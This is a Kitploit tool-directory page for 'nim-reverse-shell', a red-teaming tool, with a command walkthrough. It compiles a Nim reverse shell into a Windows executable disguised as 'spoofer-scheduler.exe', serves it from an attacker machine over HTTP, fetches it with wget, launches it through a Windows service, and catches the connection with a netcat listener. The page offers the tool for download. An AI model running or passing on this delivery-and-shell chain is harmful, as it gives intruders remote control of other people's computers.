Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
nim-reverse-shell — nim-reverse-shell | Kitploit
Tools/GitHubGitHub/h3x0v3rl0rd/nim-reverse-shell
Payload GenerationPost-ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubh3x0v3rl0rd/nim-reverse-shell

nim-reverse-shell

nim-reverse-shell

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

nim-reverse-shell

nim-reverse-shell

Example:

root@kitploit:~
sudo apt install nim

update the script accordingly

image

root@kitploit:~
nim c -d:mingw --app:gui --opt:speed -o:spoofer-scheduler.exe reverse.nim

image

root@kitploit:~
python3 -m http.server 8888
root@kitploit:~
wget http://tun0:8888/spoofer-scheduler.exe -o spoofer-scheduler.exe

image

root@kitploit:~
sc.exe stop spoofer-scheduler
sc.exe start spoofer-scheduler

image

root@kitploit:~
nc -nlvp 8080

image

Download Tool